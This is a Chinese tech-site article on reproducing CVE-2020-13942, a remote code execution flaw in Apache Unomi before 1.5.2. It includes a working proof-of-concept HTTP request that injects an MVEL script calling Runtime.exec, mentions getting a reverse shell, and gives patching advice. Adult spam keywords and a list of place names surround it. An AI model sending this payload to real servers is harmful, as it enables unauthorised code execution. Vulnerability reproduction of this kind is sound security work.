91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

發布時間:2021-12-29 15:34:49 來源:億速云 閱讀:139 作者:柒染 欄目:安全技術

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

CVE -2020-13942 (Apache Unomi 遠程代碼執行漏洞)

一、漏洞描述:

Apache Unomi是一個Java開源平臺,這是一個Java服務器,旨在管理,潛在顧客和訪問者的數據,并幫助個性化體驗。Unomi可用于在非常不同的系統(例如CMS,CRM,問題跟蹤器,本機移動應用程序等)中集成個性化和配置文件管理。

在Apache Unomi 1.5.1版本之前,攻擊者可以通過精心構造的MVEL或ONGl表達式來發送惡意請求,使得Unomi服務器執行任意代碼,漏洞對應編號為CVE-2020-11975,而CVE-2020-13942漏洞是對CVE-2020-11975漏洞的補丁繞過,攻擊者繞過補丁檢測的黑名單,發送惡意請求,在服務器執行任意代碼。

二、影響版本:

Apache Unomi < 1.5.2

三、漏洞復現:

訪問頁面樣式

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

POC:

POST/context.jsonHTTP/1.1Host: localhost:8181User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0Content-Length: 486{"filters": [ {"id":"boom","filters": [ {"condition": {"parameterValues": {"":"script::Runtime r = Runtime.getRuntime(); r.exec(\"gnome-calculator\");" },"type":"profilePropertyCondition" } } ] } ],"sessionId":"boom"}

抓包poc執行:

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

查看DNSlog記錄:

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

嘗試反彈shell:

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

執行反彈shell命令腳本:

獲取shell

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

四、修復方案

1、盡可能避免將用戶數據放入表達式解釋器中。

2、目前廠商已發布最新版本,請受影響用戶及時下載并更新至最新版本。官方鏈接如下:

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

卫辉市| 丹巴县| 托克逊县| 游戏| 凤山市| 华亭县| 曲松县| 广东省| 江阴市| 罗平县| 德安县| 枣强县| 泰安市| 承德市| 三明市| 孝感市| 敦煌市| 伊金霍洛旗| 大同县| 西乌珠穆沁旗| 麦盖提县| 宜兴市| 珲春市| 阳原县| 青州市| 宁化县| 准格尔旗| 沁源县| 昔阳县| 镇沅| 贵定县| 无棣县| 望都县| 永平县| 武平县| 铁岭市| 射洪县| 洞头县| 城市| 瑞昌市| 聂荣县|